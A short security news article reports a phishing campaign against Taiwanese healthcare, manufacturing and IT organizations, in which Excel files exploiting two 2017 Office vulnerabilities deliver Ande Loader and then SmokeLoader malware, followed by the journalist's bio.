Malicious Excel file delivered in phishing campaign.
Healthcare, manufacturing, and IT organizations across Taiwan have been subjected to SmokeLoader malware intrusions as part of a new campaign.
According to research from Fortinet FortiGuard Labs, in a report shared with The Hacker News, attacks began with phishing emails which contained a malicious Microsoft Excel file, which leverages the CVE-2017-0199 and CVE-2017-11882 vulnerabilities to deliver the Ande Loader.
Ande Loader would then facilitate the deployment of SmokeLoader, which not only contains a decrypting stager and persistence-establishing primary module but also features extensive plugin support enabling the exfiltration of various data types, including email addresses, FTP credentials, and Outlook data.
SmokeLoader is a malware downloader first advertised in cybercrime forums in 2011, and is chiefly designed to execute secondary payloads. Additionally, it possesses the capability to download more modules that augment its own functionality to steal data, launch distributed denial-of-service (DDoS) attacks, and mine cryptocurrency.
Written by
Dan Raywood
Senior Editor
SC Media UK
Dan Raywood is a B2B journalist with more than 20 years of experience, including covering cybersecurity for the past 16 years. He has extensively covered topics from Advanced Persistent Threats and nation-state hackers to major data breaches and regulatory changes.
He has spoken at events including 44CON, Infosecurity Europe, RANT Conference, BSides Scotland, Steelcon and ESET Security Days.
Outside work, Dan enjoys supporting Tottenham Hotspur, managing mischievous cats, and sampling craft beers.
